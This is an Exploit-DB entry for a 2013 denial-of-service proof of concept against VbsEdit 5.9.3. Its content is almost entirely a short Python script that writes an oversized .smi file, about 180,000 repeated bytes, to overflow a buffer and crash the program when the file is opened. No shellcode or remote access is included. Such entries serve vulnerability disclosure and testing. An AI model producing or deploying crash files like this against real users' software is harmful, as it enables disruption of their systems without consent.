VbsEdit 5.9.3 - '.smi' Buffer Overflow (PoC)

Author: d3b4g
type: dos
platform: windows
port: 
date_added: 2013-07-22  
date_updated: 2013-07-22  
verified: 1  
codes: OSVDB-95531  
tags:   
aliases:   
screenshot_url: http://www.exploit-db.com/screenshots/idlt27500/screen-shot-2013-07-22-at-85119-am.png  
application_url: http://www.exploit-db.comvbsedit.exe  

raw file: 27010.txt  
# Exploit Title: VbsEdit 5.9.3(.smi file handling) Buffer overflow vulnerability
# Date: 22.7.2013
# Exploit Author: d3b4g
# Vendor Homepage:http://www.vbsedit.com/
# Software Link: http://www.vbsedit.com/
# Tested on: Windows XP SP3
# Twitter: @schaba



#!/usr/bin/python
# Tested on: win XPsp3
chars = "A"*90000
crush = "\x41\x41\x41\x41"
file=open('exp.smi','w')
file.write(chars+crush+chars)
file.close()